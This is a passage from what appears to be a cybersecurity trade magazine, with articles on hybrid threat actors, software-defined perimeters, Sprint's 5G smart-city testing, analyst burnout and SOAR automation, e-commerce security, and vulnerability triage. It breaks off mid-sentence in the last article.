highlighting ‘criminal intent’ with vast majority being financially motivated; 3) Hacktivism, ideological in<br />

nature and extremely resilient; and 4) Commercial Entities, private legal entities that create marketplaces<br />

for the commercialization of offensive/defensive hacking and surveilance capabilities.<br />

While categorizing threat actors into classes such as these has been helpful for information security<br />

professionals during identification and remediation processes, new research from Optiv Security reports<br />

automated threat categorization to be a double-edged sword. According to Optiv’s <strong>2019</strong> <strong>Cyber</strong> Threat<br />

Intelligence Estimate (CTIE) report, it’s a mistake to assume that these categories are rigid or to assume<br />

that a threat actor’s classification is distinct and static, because a growing trend in cybersecurity is on the<br />

rise: threat actors impersonating each other to hide true intentions. Called “hybrid threat actors,” this<br />

135


emerging class of cyber-criminals masquerades as a different classification to hide their true agenda.<br />

And, some using more than two, switching between classes as priorities change.<br />

Hybrid threat actors introduce tremendous security risk, because security orchestration and automation<br />

tools are not looking for the curve ball. Let me explain.<br />

Automated security technology is designed to reduce the work load on resource-constrained IT teams.<br />

An example of automated security technology can be found in the detection and response functionality<br />

of a SIEM. Automated alert investigation and response is based on pre-determined rules and/or<br />

behaviors. Variable thresholds allow organizations to customize their detections in response to changing<br />

threats, such as financially motivated attacks. Automation can also be used as an effective tool to set<br />

default responses to alerts.<br />

The problem, though, is that threat actors have figured out how to impersonate other categories of<br />

adversaries to divert attention away from their true target. For example, there may be a state sponsored<br />

threat actor posing as a garden-variety cyber-criminal targeting the customer database. While security<br />

systems are triggering an automated response, attackers shift their tactics to executing on their true<br />

intention – installing malware to siphon off intellectual property (IP). The security team thinks it has<br />

thwarted an attack on the customer database because of a kill chain trigger, but, in reality, it may have<br />

missed the ongoing theft of IP. Think of it this way: Someone breaks into an office and steals a couple of<br />

printers to make the police think it’s a petty theft, but what they’ve actually done is put listening devices<br />

in the CEO’s office and the boardroom so they can manipulate the stock market.<br />

What can be done?<br />

CTIE research shows that activities by hybrid threat actors are on the rise, and they’ve mastered the art<br />

of deceiving security tools to reach their intended target. Information security professionals have been<br />

doing it for years, so why would we assume that these hybrid threats wouldn’t? The question for IT<br />

security teams is: What can be done to stop them? Here are three best practices that will help defend<br />

against this new class of threat actors – and mitigate enterprise risk in the process.<br />

1) Implement a risk-centric approach to security – If there’s one thing that we urge organizations<br />

to do, it’s to tie cybersecurity functions to enterprise risk. This means ensuring business-specific<br />

risk and business objectives dictate the security model, rather than the latest cybersecurity threat<br />

or compliance mandate. With a risk-centric approach to security, IT security teams can accurately<br />

identify what data and assets are most likely to be targeted, who is most likely to target them, and<br />

how it will likely happen – and then they can customize their security strategy accordingly.<br />

Because the focus is on business risk and not one particular class of threat, the attack method<br />

and cyber-criminal motive are no longer the basis for cybersecurity strategy. Rather, prioritizing<br />

and protecting high-risk targets is the basis for strategy. In the example cited earlier, the<br />

organization would already have understood that state sponsored threat actors were a likely<br />

136


adversary due to intellectual property importance, so there would be no possibility of leaving that<br />

kind of hybrid attack “undefined.”<br />

2) Master security “basics” – Optiv’s recent “State of the CISO” research report found that<br />

organizations are not prioritizing security basics like patch management and vulnerability<br />

scanning – even though unpatched vulnerabilities are often cited as the most common source of<br />

data breaches (57% of all breaches, according to a study by the Ponemon Institute). Failing to<br />

execute on security basics leaves holes that cyber-criminals are increasingly adept at exploiting.<br />

Not to mention, if a company isn’t operating well when it comes to cyber-security fundamentals,<br />

then it won’t be able to successfully implement more advanced security processes, technologies<br />

and initiatives.<br />

3) Maintain the human element – Automated security tools can help us cut down on the noise and<br />

make cyber-security more manageable for information security teams, but it’s not the “fix all”<br />

solution. Flipping the automation switch doesn’t surround the organization with an impenetrable<br />

shield. Organizations must continue to include the human element in security processes, so, when<br />

hybrid threat actors do throw a curve ball, information security professionals are there to switch<br />

up the grip and grab the home run. It’s also important for information security teams to periodically<br />

reevaluate defined threat actor groups and associated security policies to ensure they align with<br />

the latest industry developments. Hybrid threat actors require a hybrid solution.<br />

While hybrid threat actors are a component that many organizations haven’t yet encountered, there’s no<br />

reason to panic. By implementing a risk-centric security model and following best practices such as those<br />

above, information security teams can build and maintain a solid security foundation. And with this<br />

strategy in place, organizations can put themselves in a strong position against the cybersecurity battle,<br />

every time.<br />

About the Author<br />

Jonathan Drake is a professional Intelligence analyst accumulating<br />

nine plus years of civilian and military experience. Drake is currently<br />

employed as a Senior <strong>Cyber</strong> Intelligence Analyst with Optiv and is a<br />

critical member of Optiv’s Global Threat Intelligence Center Team<br />

(gTIC). As a member of the gTIC, he assists staff and clients<br />

with cyber-based intelligence research and products. As a<br />

processional intelligence analyst, Drake seeks to deploy his refined<br />

analytical skills and technical knowledge to assist leaders with<br />

obtaining goals and objectives set by stakeholders. Jonathan can be<br />

reached online at https://www.linkedin.com/in/jonathandrake83/ and at<br />

our company website https://www.optiv.com/<br />

137


Software Defined Perimeter Deep Dive & Required<br />

Implementation Readiness<br />

By Parthasarathi Chakraborty<br />

SDN, SDWAN & SDP are frequently encountered terminologies to the technology professionals these<br />

days. It is necessary to understand each of these terms before making any technology purchase decision.<br />

As a security executive, I was confused when first encountered these concepts. I thought it will be a good<br />

idea to pen down some of the differences and utilities of these technologies for with a focus on SDP and<br />

prework needed by the organizations for a successful adoption.<br />

What is SDN or SDWAN?<br />

SDN or software defined networking is a concept that isolates control plane or brain of the networking<br />

gear from the data plane resulting in faster, better and cheaper ways of corporate internetworking. Branch<br />

to headquarter connectivity used to require expensive T1 circuits, private MPLS cloud with classic<br />

networking. In todays world with the advent of IaaS, PaaS and SaaS services, branches require to have<br />

138


a multi-dimensional connectivity with corporate headquarter and cloud service providers. It requires an<br />

intelligent and faster transport with lower total cost of ownership. SDWAN or software defined wide area<br />

networking came into picture which is a realization of SDN concepts. Regular routers are offloaded from<br />

routing, quality of service or intelligent intent based networking decisions and focus purely on faster<br />

packets processing. SDWAN decouples networking control plane from data plane with a new and<br />

intelligent overlay network. Corporations no longer need expensive MPLS or T1 only circuits, can have a<br />

variety of transport including cable, LTE, 4G/5G connections over internet for connectivity. SDWAN<br />

overlays decide routing, QoS and other intelligence where the underlaying transport focuses on data<br />

delivery. SDWAN is faster, transport agnostic (MPLS/4G/LTE/Cable) and cheaper wide area connectivity<br />

for organizations and SDP is needed to secure SDWAN connectivity.<br />

What is SDP and how does it work?<br />

SDP or software defined perimeter is based on the concepts of SDN but focuses on eliminating the<br />

inherent security weakness of network level connectivity by adhering to the concepts of ZTS or zero trust<br />

security model. Classing network connectivity is based on a trust boundary, usually established by<br />

placing a firewall. Inside the firewall resources are “trusted” and allowed to talk to each other in a more<br />

lenient fashion compared to entities from “outside” the firewall trying to connect to the resources “inside”<br />

the corporate network. This model used to work just fine but has becomes flawed today because the<br />

demarcation between inside and outside network is getting blurred. Cloud, bigdata, mobility is the driver<br />

for extending the organization’s boundary beyond corporate data centers into public space making it just<br />

impossible to have a demarcation. Without a defined boundary, the onus is on cyber folks to protect the<br />

resources regardless of the origin of the connection – be it “inside” or “outside” the corporate network.<br />

Zero trust security (ZTS) got prominence because of the new context where organizations can’t have a<br />

defined boundary. The core concept of ZTS is allowing communication on “need to know” basis with<br />

overly restrictive access permissions. Only allow the application or services needed to run the application<br />

supporting a business process and take away unnecessary permissions. SDP accomplishes zero trust<br />

security with an architecture that requires three components- SDP client, SDP controller and SDP<br />

gateway. SDP controllers act as a brain and the central decision-making authority for allowing SDP clients<br />

on the remote branch or third-party networks to talk to the protected resources behind the SDP gateways<br />

in the corporate data centers. Remote computers running SDP clients can only connect to allowed and<br />

published applications on the corporate data center brokered through the controllers after the user is<br />

authenticated and authorized at the controller level and the device integrity along with other granular<br />

posture details like geolocation is validated. The flow of events will be the following;<br />

• SDP gateway established a connection with the SDP controller through which it exchanges<br />

information about published applications in the corporate data centers and receives information<br />

about “screened” SDP clients before allowing the inbound connection<br />

• SDP clients authenticate, authorize using PKI with the SDP controller, part of the process the<br />

device integrity is also validated with posture scan and footprint hash. Only when the user behind<br />

the SDP client is authenticated, authorized and the device carrying the SDP client is validated to<br />

have the right level of integrity, SDP controller provides SDP gateway IP address to establish a<br />

connectivity.<br />

139


• SDP client opens the tunnel with remote SDP gateway and gets the access to allowed<br />

applications published for the client<br />

Is SDP a buzzword or it comes with great benefits?<br />

Now we understand the SDP architecture, but the question becomes why do we need it in the beginning?<br />

It is a buzzword or a shiny-toy syndrome or it truly brings benefit to the organization? The short answer<br />

is SDP brings security benefits with a huge cost saving and reduces operational complexities by lowering<br />

the number of devices needed to manage for allowing a remote connection to the corporate hosted<br />

application. But what’s wrong with classic remote access VPN or site to site VPN connectivity model?<br />

Basically, the classic connectivity requires a ton of appliances called VPN concentrators on the corporate<br />

headquarter to validate incoming requests from remote users or branches. After authentication and<br />

authorization, the remote user or branch lands on the “inside” network with a free pass to conduct<br />

reconnaissance since it gets an IP address of the inside “trusted” network. Any hacking attempt starts<br />

with discovery of services or reconnaissance, if we can stop the discovery by only allowing access to the<br />

applications as opposed to assigning an IP that is routable inside the VPN concentrator then we can<br />

reduce the security risk to a greater extent. Applying the concepts of zero trust security also allows us to<br />

validate the identity of the user or integrity of the computer of the connectivity request. Aside form security<br />

benefits, SDP is also a cost saver by eliminating the needs of keeping the stacks of VPN concentrators.<br />

The brain behind zero trust connection stays with the SDP controllers which are cloud based services in<br />

most of the cases that can be scaled up or down at a fraction of the cost and the organizations need a<br />

few service provider owned SDP gateways in the corporate data centers resulting in a huge cost saving.<br />

What considerations should be given before starting any SDP implementation?<br />

First and foremost, SDP implementation requires certain level or organizational maturity. On the surface<br />

it sounds like a hassle-free switchover, more secure and cost saver remote connectivity solution but you<br />

may end up opening security holes unless you have a strong segmentation practice implemented in the<br />

corporate network. Implementing and upkeeping a micro segmentation is a fair amount of work<br />

depending on the size of the organization. But why do we need a micro segmentation solution for a<br />

secure adoption of SDP? Isn’t SDP supposed to bring more security to the environment? The answer is<br />

in the SDP architecture. The gateway is a piece of software provided, managed and maintained by the<br />

SDP vendor that is in the corporate datacenter. As explained in the previous section, SDP gateways<br />

initiate and always keep a connection open with the SDP controller. Even though the remote clients can<br />

only access applications allowed for remote consumption, the SDP agent can move horizontally in the<br />

corporate network and conduct reconnaissance or connect to any other server by exploiting loopholes<br />

and privilege escalation techniques. Unarguably it can only happen when the SDP service and the<br />

gateway is compromised. Since the gateway software is managed, operated and upgraded by the service<br />

provider where organizations don’t have any control or ability to implement standard software<br />

development life cycle process with security checks and balances – it is always advisable to not<br />

completely trust the SDP gateway and build a perimeter around it’s mobility. It is required to have a<br />

microsegmentation implementation to ensure the SDP gateway can not move horizontally in case it is<br />

compromised and infect other system with a wider blast radius.<br />

140


To conclude, we can say that SDP certainly makes sense to adopt as a VPN replacement solution to<br />

reduce cost and improve security, but organizations should have a microsegmentation implementation<br />

in place before deploying SDP.<br />

About the Author<br />

Parthasarathi Chakraborty<br />

CISSP, CCSP, CEH, CHFA, MS (Infosec -WGU), MS (Technology<br />

Management -Columbia University)<br />

Director – Infrastructure & Cloud Security Architecture<br />

Currently at Bank of Montreal, previously with Guardian Life, JP Morgan, Bank<br />

of America & Merrill Lynch in <strong>Cyber</strong> Executive Leadership Roles<br />

Member: Forbes Technology Council, Rutgers University <strong>Cyber</strong> Security Advisory Board, New Jersey<br />

Institute of Technology CSLA Advisory Board<br />

141


Sprint Beta Testing 5G Smart City in Georgia<br />

By Kayla Matthews, Freelance Writer, Productivity Bytes<br />

Sprint has started beta testing some of its new 5G technology in Peachtree Corners, Georgia. Though<br />

the test doesn't encompass the whole city, it will determine what conditions would be like on a larger<br />

scale than the previous rollout.<br />

Sprint is using the Curiosity Lab, which contains a 1.5-mile track inside a 500-acre technology park. It's<br />

made only for autonomous vehicles, meaning Sprint is starting to look closer at self-driving cars.<br />

At least seven companies participated in the unveiling on the first day, each one bringing along a little<br />

something different.<br />

Kia tested out autonomous vehicles but was the only major car company there. Local Motors brought<br />

autonomous passenger shuttles, though, which made up the difference. Drones were brought in from<br />

Autodyne, and Softbank Robotics arrived with floor cleaners.<br />

Going in a different path was Georgia Power with smart light poles, Reef Kitchen with delivery-only<br />

kitchen solutions and CloudMinds for AI testing in the cloud.<br />

Here's what Sprint has been doing in Peachtree Corners, and what it means for the future of 5G and<br />

autonomous technology.<br />

142


The Launch of Curiosity IoT<br />

The cloud has a lot to do with the Peachtree Corners testing. In <strong>November</strong> 2018, Sprint launched its<br />

Curiosity IoT (Internet of Things.) The Curiosity IoT is software that directs traffic within the IoT. This<br />

entire directive is to build better smart cities for the future by starting with IoT and making it more efficient.<br />

As technology advances and time goes on, we accumulate massive amounts of data at any given<br />

instance. Part of 5G on the Curiosity IoT is to help build more space for all this information while still being<br />

able to collect more. The Curiosity IoT will allow any device to connect to the IoT no matter what<br />

technology is used, so we'll have more efficiency and better access.<br />

Sprint Leads the Charge<br />

Peachtree Corners isn't the first place to see 5G technology from Sprint. In fact, Sprint launched mobile<br />

5G in Atlanta in May <strong>2019</strong>. This network covered 150 square miles and over 560,000 people, allowing<br />

them to be the first members of the public to use 5G whenever they wanted.<br />

The testing is a little different in Peachtree Corners, as residents can use the network but they are not<br />

part of the experiment.<br />

Sprint is certainly not the only carrier to start testing 5G's limits. Verizon is working on its own initiative at<br />

the University of Michigan with its connected city plan called Mcity. It works with a 32-acre site that<br />

includes over 16 acres of traffic infrastructure and a test track, much like Sprint.<br />

The approach is to create better 5G solutions for autonomous vehicles with pedestrian safety in mind.<br />

The 5G Turning Point<br />

Jan Geldmacher, president of Sprint Business, gave a statement when the Peachtree Corners testing<br />

facility was announced.<br />

She explained their 5G plan as follows: "From enabling the most accurate real-world navigation possible<br />

to delivering immediate intelligence from IoT connections, companies can now better test, and ultimately<br />

scale, new solutions for the smart city landscapes of tomorrow."<br />

Though the testing facility at Peachtree Corners has thus far focused on businesses and their innovation<br />

needs, Sprint is still looking at the public's point of view through Atlanta.<br />

At this rate, perhaps 5G will become the new normal before we know it. Until then, there's a lot of testing<br />

to be done, especially when handling, organizing and storing the immense amount of data we've collected<br />

and continue to find.<br />

Sprint is already conducting the testing required to lead this technology well into the future.<br />

143


About the Author<br />

Kayla Matthews, a cybersecurity journalist, has written for sites like<br />

Security Boulevard, the National <strong>Cyber</strong> Security Alliance, Information<br />

Age and more.<br />

Matthews can be reached via Twitter @KayleEMatthews or on<br />

ProductivityBytes.com.<br />

144


Stressing Security Teams<br />

By Jody Caldwell<br />

Workplaces create stress – it’s an unfortunate fact of life – work is stressful. Stress isn’t even terribly<br />

complicated. People stress out when they believe that demands outstrip their resources or know-how.<br />

There’s a difference between feeling pressure and feeling anxiety. Sometimes being “under pressure” is<br />

positive, because it’s a challenge that ultimately provides an employee a sense of accomplishment.<br />

Sometimes it even yields an iconic collaboration between David Bowie and Freddie Mercury.<br />

While employees may be willing to accept pressure, they shouldn’t be forced to accept anxiety. Too much<br />

or too-difficult work can lead to long-term worry, which rarely leads to higher productivity. Whether feeling<br />

stressed due to lack of personal efficiency, proper training, collegial appreciation or even systemic<br />

dysfunctions, too much pressure can quickly escalate to manifest harmful physical and emotional<br />

reactions.<br />

145


Despite coffee mugs regularly shouting from the shelf that “the grind never stops”, habitual stress puts<br />

the human body in an endless fight-or-flight response mode, elevating blood pressure, increasing the<br />

heart rate and straining the body and mind. Just ask Dr. Bruce Banner. While security analysts won’t gain<br />

super-strength from super-stress, they may turn a shade of green: workers who are under constant<br />

pressure get sick more easily, are more irritable, and have a harder time concentrating.<br />

For security pros, such stress and anxiety has become a daily fixture, leading to an alarmingly high<br />

degree of burnout. Talent attrition is an enormous problem within the industry. Even more worrisome,<br />

ESG has found that 68% of cybersecurity professionals believe that a cybersecurity career can be taxing<br />

on the balance between one’s personal and professional life.<br />

Given the rise of mental health awareness, companies are now alarmed about the consequences of their<br />

security experts taking the pressure of their jobs home with them. Many places of business are searching<br />

for solutions to mitigate the effects of stress like substance abuse and major depression. But companies<br />

need go beyond providing employees with massage chairs, napping rooms and fur-ternity leave, and<br />

equip them with the necessary tools to manage the demands of their roles.<br />

Security analysts are inundated with more data than ever. Ostensibly, this is a good thing as it means<br />

access to a larger collection of threat indicators. At some point, though, more data starts to become too<br />

much data. Teams have to manage feeds and data inflow from multiple intelligence providers and open<br />

source providers. Tickets and events come up tens or hundreds of times a day, raising frequent and false<br />

alarm bells that unnecessarily spike the heartrate of analysts, or worse, inure them to threat. SIEMs have<br />

been helpful in monitoring the network by collecting and correlating the data, but they still require an<br />

analyst to follow up by researching the event, determining the relevant action to be taken, and ultimately<br />

submitting the ticket.<br />

There’s no question this is a real but silent suffering in security. Providing triage to so many alerts is a<br />

tedious and mind-numbing task with little reward and a lot of risk. When the demands are greater than<br />

the supply of attention an analyst can provide, things begin to fall between the cracks. An overload of<br />

expectations in combination with inefficient solutions may prevent employees from being productive. In<br />

some cases, people faced with this strain avoid dealing with a problem entirely, which may worsen the<br />

situation and increase tension for them and others around them. Drawing upon a useful axiom, even<br />

information is best in moderation.<br />

Organizations can help prevent their IT and cybersecurity professionals from becoming either anxious<br />

from or desensitized to alerts, warnings and notifications by shedding manual processes and using<br />

platforms that have been invented from the start with the cyber team in mind. In doing so, they can solve<br />

an immediate business problem and prevent a future one – employee retention issues.<br />

Put Some Things on Auto-Pilot<br />

When a job becomes overly tedious and manual, it frustrates valued talent. Security teams are driven by<br />

highly intelligent individuals who are rarely happy performing monotonous tasks like North Pole elves in<br />

a holiday movie. Companies can save their talent from spending the majority of their days copying and<br />

pasting between spreadsheets and tools through tailored automations that are often called playbooks.<br />

146


Playbooks are most widely known in the world of sports as a collection of strategies and plays that a<br />

team has practiced and could potentially run during a game. There are parallels to this in the world of IT,<br />

tasked that are common across organizations and can be managed through automation that efficiently<br />

processes data, creates intelligence and pushes it out to security teams or defensive tools. In short, when<br />

it comes to security teams, we’re telling you to put them in, coach.<br />

The resulting time savings frees up analysts to focus on more complex work that requires their intellects.<br />

Instead of worrying about submitting tickets to a firewall team or stressing out with each and every alert<br />

that comes up, they can spend more time on higher level threats and solutions – things that can’t be<br />

automated.<br />

Teach Self-<strong>Defense</strong><br />

Some security analysts endure the mental strain that comes with working on tasks without adequate<br />

training. 62% of cybersecurity professionals believe that their organization is not providing an adequate<br />

level of training for them to keep up with IT risks. That’s like giving half of Hogwarts a pool noodle to fight<br />

Voldemort.<br />

While companies trust cybersecurity teams with the entirety of their data, analysts’ current roles don’t<br />

allow time for more sophisticated cybersecurity education—setting both parties up for disappointment<br />

when a lack of education slows the response time for the inevitable breach. Businesses keep security<br />

analysts busy with boring and redundant tasks yet expect them to save the day when issues of higher<br />

complexity come knocking.<br />

Frustration can easily occur when being forced to make decisions without being properly informed, just<br />

ask anyone with only a selfie to go off of when deciding whether to go on a date with their Tinder match.<br />

An integrated cybersecurity platform is like getting a friend’s opinion of all of your dating-app matches, it<br />

can reduce guessing and provide context for threat data, resulting in better outcomes. One of the many<br />

benefits of a SOAR (Security Orchestration, Automation and Response) platform is that it automatically<br />

ingests all of the internal data and external threats. It then normalizes the information to be easily<br />

understood by each user role.<br />

The Well-Being Supply Chain<br />

Security analysts are among the most highly educated employees in many companies, endowed with<br />

unique skill sets not found elsewhere within most organizations. Forcing these individuals to spend their<br />

time completing repetitive tasks while trying to prepare for the unknown is difficult enough- Mr. Miyagi’s<br />

method of preparing a child to fight by having them tediously wax his car is a training technique that only<br />

works in The Karate Kid. Outside the cinematic universe, adding the requirement to prove one’s worth<br />

without tools to do so can truly weigh heavily on one’s mental health. It also turns them into less effective<br />

collaborators with their supervisors.<br />

147


SOAR platforms can help to alleviate stress further up the chain of command as well. Being able to show<br />

ROI is crucial for those feeling the constant anxiety of demonstrating their worth. Supervisors in the IT<br />

field have long been plagued by accountability and attribution problems with respect to proving their value<br />

– it’s difficult to attach a dollar value to the downtime that never happened.<br />

By nature, security teams are not revenue-generating, but they’re designed to protect the business<br />

services that do. When a cyber security team is successful in achieving zero downtime, nobody notices,<br />

so for those looking in from the outside, it can be difficult to measure the value a security analyst brings<br />

to a company. When security analysts are able to easily demonstrate return on an investment, they no<br />

longer struggle to procure future resources that could be critical for the continued success of security<br />

operations, and even for the company as a whole.<br />

From the perspective of those tasked with overseeing the structure of a company and the use of its<br />

resources, empowering the cybersecurity team to better orchestrate and automate its routine and highstress<br />

tasks only makes sense. It’s also simply the more ethical approach – with better tools available<br />

thanks to SOAR platforms, there’s simply no reason to continue subjecting our colleagues and team<br />

members to unnecessary stress.<br />

About the Author<br />

Jody Caldwell is the Sr. Director of Customer Success for ThreatConnect.<br />

Previously, he spent time in both the DoD and the Intelligence Community working<br />

with Network Security Operations Centers (NSOC) and Computer Emergency<br />

Response Teams (CERTS) in a variety of positions that include cyber threat<br />

analysis and leading cyber threat hunt teams. Jody's passionate about working with<br />

customers to strengthen security programs and leverage cyber threat intelligence<br />

to enhance their awareness while mitigating risks. Jody lives in Charleston, SC and<br />

enjoys boating and golfing.<br />

148


The Importance of <strong>Cyber</strong>security When Dealing With Online<br />

Customers<br />

By Riya<br />

The internet has become one of the most populated places ever known. With more businesses deciding<br />

to integrate, it is good to note that the level of insecurity when it comes to transactions is still not<br />

impressive. From records, millions of dollars are lost online, thanks to hackers. As an e-commerce<br />

entrepreneur, you should know that keeping your website safe from such threats is the first thing you<br />

need to do. It's also important to understand that other than hackers, there are other more threats that<br />

can severely affect your business. Other reasons why you need to keep your site security on high alert<br />

is because;<br />

You want to protect your customers’ details<br />

One of the things that hackers are always looking for is the personal details of people. That is why anyone<br />

running an e-commerce website that requires the customers to share sensitive information needs to<br />

ensure that the data is safe. What happens is, a hacker needs this information to impersonate the original<br />

owner. This can give them easy access to many online platforms used by the owner, including the bank<br />

account. That is why most e-commerce websites are required to use SSL certificates. That is because<br />

they encrypt data shared between two computers. If you have an e-commerce website that runs multiple<br />

149


subdomains, you can opt for a wildcard SSL certificate. You will although want to take your time to find<br />

the most excellent that is easy to use.<br />

You don’t want bad reviews<br />

With a poor service on your ecommerce website, you are most likely to get bad reviews on your social<br />

media pages and other discussion forums. This should be the worst that to ever happen to your business,<br />

especially if they are more than the positive reviews. When customers who shop from your website keep<br />

ending up with a cybersecurity breach, they will not want the same thing to happen to someone else. Bad<br />

reviews can mean danger to your enterprise, and in worst scenarios, you will have to shut down.<br />

You want to keep viruses and malware out<br />

Other than hackers, some programs can cause damage to your computer. As the admin, know that you<br />

have a lot of data to protect. Some customers use machines that have been invaded by these programs,<br />

and through sharing data, they can quickly transfer them to your servers. To avoid all this risk, you need<br />

to make sure that your guard is always up. Some customers don’t know so much about cybersecurity<br />

and as part of boosting your security, you should enlighten them.<br />

There are several ways through which malware or virus can attach a smart device or computer. Some<br />

include;<br />

• Using a public Wi-Fi that is shared<br />

• Downloading files that you are not sure about<br />

• Clicking on ads and some links<br />

• Using a USB storage that contains affected files<br />

• Accessing unsafe websites<br />

You don’t want to lose money<br />

Some hackers are too smart and realizing that you have not adequately secured your e-commerce<br />

website, they can clone it and divert customers. What happens is, they come up with a website looking<br />

exactly like yours and put it right in front of your site. That means, when someone tries to access your<br />

website, they will find the one belonging to the hackers first. Not only will they share some sensitive<br />

information, but they will also end up making payments to the wrong account without knowing it.<br />

You want to safeguard your reputation<br />

Reputation is vital in any ecommerce company, and that is why names like eBay and Amazon remain<br />

giants in this industry. Some customers can only shop from these two platforms because of the name<br />

they have. One of their main strengths is that they are true meaning that customers have less to complain<br />

about. It is, however, important to mention that sometimes, they too experience problems. A good<br />

reputation ensures the future of your company because an impressed customer is more likely to drag<br />

two or one new customers every once in a while.<br />

150


You don’t want problems with the authorities<br />

Without a secured e-commerce website, you already know that your customers are not safe. If a hacker<br />

manages to access the bank account of your customer and clear the money, you remain accused. This<br />

can land you in court, especially if you are guilty of not adhering to the rules of running an online shop.<br />

The law understands that as the business owner, customer protection is your responsibility because you<br />

are responsible for the payment gateway settings. If anything, a customer willing to buy your products<br />

doesn’t have a problem of physically finding your store if it is within their reach.<br />

You may want to expand<br />

In most cases, online businesses tend to snowball. Some end up getting more orders from other countries<br />

than their local area. Hackers are attracted to online companies that perform well because they promise<br />

a bigger reward if they manage to breach. If you have been keen on cybersecurity options like SSL<br />

certificates, you will find that they are sold in categories depending on the level of security needed. That<br />

is because they understand that the more an online company is expending, the higher the risks. You will,<br />

therefore, need to upgrade your security concerning the size of your market.<br />

Conclusion<br />

Online companies invest lots of money to ensure that they keep their customers and data safe. There<br />

are many ways of doing this but most importantly, know that one technique alone may not be enough to<br />

keep the hackers away. Combine some methods and for better results, get a cybersecurity expert on the<br />

job. One mistake that much new e-commerce entrepreneur do is that they use videos and articles from<br />

the internet to set up security. It is not a bad thing; however, know that for the safety of your company,<br />

you will need more advanced skills. Besides, hackers have already watched the same videos and are<br />

already scheming for alternatives.<br />

About the Author<br />

Riya is working as content marketer at ClickSSL.net. She has inspired writer<br />

writing in several areas of expertise. With spending her years working marketing<br />

communication, Riya is delighted to work with aspiring small business owners.<br />

Apart from her marketing expertise, Riya always enjoys reading pocketbook,<br />

cooking, and traveling.<br />

151


How to Stop <strong>Cyber</strong>security Attacks before They Start<br />

By Dr. Johannes Bauer, principal security advisor, identity management & security, UL<br />

<strong>Cyber</strong>security breaches are part of the nasty<br />

reality of today's IT infrastructure and even<br />

though they are not commonly talked about,<br />

many individuals and businesses are the targets<br />

of attacks. Sometimes the victims are none the<br />

wiser that a breach even occurred or data was<br />

stolen. When looking toward the Internet of<br />

Things (IoT), it becomes even messier. With<br />

over an estimated 30 billion connected devices,<br />

IoT cybersecurity has a greatly increased attack<br />

surface compared to enterprise infrastructure.<br />

This also provides an attack surface that is<br />

decentralized and distributed among millions of<br />

different networks all over the world.<br />

Everything would be so much easier if only, after<br />

discovery of an attack, we could push a button,<br />

go back in time, and do things over. With no<br />

DeLorean with a flux capacitor on the horizon,<br />

that option falls flat.<br />

The first important thing to realize is that security<br />

is not a feature or property of a product. Instead,<br />

it is a process, i.e., constantly evolving and<br />

changing. The rules of the game are changing,<br />

and they're changing fast. The reason for this is<br />

152


fairly simple – software in our connected<br />

products today is complex and consists of many<br />

thousands, sometimes many millions, of lines of<br />

source code. It is guaranteed that somewhere<br />

within this code, there's a vulnerability lurking –<br />

a length field that has not been validated<br />

properly, an SQL statement that does not<br />

properly escape its input, or a webpage that<br />

includes untrusted data. At the time of<br />

manufacture, such issues might be completely<br />

unknown to the vendor of a product and, unless<br />

anyone specifically looks for these problems,<br />

they're not going to pop up. Even worse, we’re<br />

still discovering new types of vulnerabilities,<br />

which once known can affect software previously<br />

considered secure.<br />

Once they're found, these vulnerabilities or<br />

weaknesses can often become public<br />

knowledge, either through responsible<br />

disclosure by a security researcher, through<br />

direct exploitation in the field, or by reverse<br />

engineering patches which show where areas of<br />

code have been updated. Anyone can then<br />

easily pinpoint and target a specific vulnerability<br />

in order to exploit it.<br />

Therefore, in order to remain ahead of the curve,<br />

it is crucial to know what software is contained<br />

within a product. This not only means all<br />

proprietary software components but,<br />

sometimes even more importantly, all third-party<br />

code installed and used by the proprietary code<br />

as well. For each component, it’s vital to know<br />

that this is part of the overall Software Bill of<br />

Materials, but it must also list the exact version<br />

included within the package. Everything on the<br />

list then can be continuously monitored in order<br />

to be notified of any potential vulnerabilities. A<br />

good place to start is looking at MITRE's<br />

Common Vulnerabilities and Exposures (CVEs)<br />

list, where over 130,000 vulnerabilities are<br />

recorded and continuously tracked. Those CVE<br />

identifiers are used to uniquely itemize<br />

vulnerabilities. Databases like the National<br />

Institute of Standards and Technology (NIST)<br />

National Vulnerability Database (NVD) refers to<br />

the MITRE list and gives not only a rough<br />

quantification of their severity, but also enriches<br />

them by cross-referencing original sources, fixes<br />

or test code.<br />

But what happens if such a dreaded notification<br />

comes in? First, citing the advice of Douglas<br />

Adams – don't panic! Not all vulnerabilities, even<br />

those that are marked as critical, affect every<br />

product in every configuration. This is why the<br />

triage of security issues is a crucial step in the<br />

evaluation of a weakness – somebody in the<br />

organization needs to determine if the<br />

vulnerability is even effective in the way the<br />

product has been built. Many bugs only affect<br />

certain architectures under which the<br />

dependency has been built or build-time<br />

configuration variables such as linked libraries.<br />

Others only affect protocols that are configured<br />

in a certain fashion – something that might not<br />

even be used in the product itself. Examples of<br />

either would be a library that is only vulnerable if<br />

it includes XML parsing support or a TLS library<br />

that only has an issue when used with a specific<br />

cipher suite.<br />

Unfortunately, this triage process can be quite<br />

complex and detailed, and often requires skilled<br />

resources to assist or perform the process.<br />

These resources responsible for triaging the<br />

vulnerability need to decide if the product is<br />

affected by the vulnerability, and they also have<br />

to estimate the worst-case impact. For this,<br />

many things need to be taken into consideration.<br />

How large is the attack surface? How many<br />

products are in the field? Are there security<br />

controls or countermeasures already in place?<br />

After deliberating on all of these aspects, an<br />

action plan needs to be formed. Usually,<br />

patching the vulnerability is the<br />

clearest path forward, but it's<br />

not the only one. In fact, some<br />

153


circumstances even make it impossible to<br />

update a specific software component, so<br />

alternatives and workarounds are often<br />

necessary.<br />

For example, rather than patching or removing a<br />

vulnerable component, remediating<br />

countermeasures can be implemented. If a<br />

vulnerability is discovered where oversized data<br />

for a particular protocol can trigger an exploit,<br />

then a simple remedy could be to implement a<br />

firewall rule that discards such large packets<br />

before they even get to the vulnerable piece of<br />

software. For example, limiting the size of DNS<br />

packets to prevent a buffer overflow.<br />

Of course, such a change can have adverse<br />

effects on the product itself and needs to be<br />

thoroughly tested before putting in effect.<br />

Lastly, if neither patching nor a workaround is<br />

possible, a last resort can be to accept the<br />

residual risk and mitigate only the impact of a<br />

vulnerability. An example of this would be a<br />

piece of software that has a weakness which<br />

allows attackers to crash it remotely. At a<br />

minimum, the software could be configured to<br />

automatically restart in case such an event<br />

happens, and perhaps to send a notification that<br />

something has happened, so that potential<br />

exploitation of the vulnerability can be monitored.<br />

Needless to say, from a security engineering<br />

standpoint this isn't the most desired outcome,<br />

but the harsh reality is that we often don't get to<br />

cherry pick the prettiest solution. While it might<br />

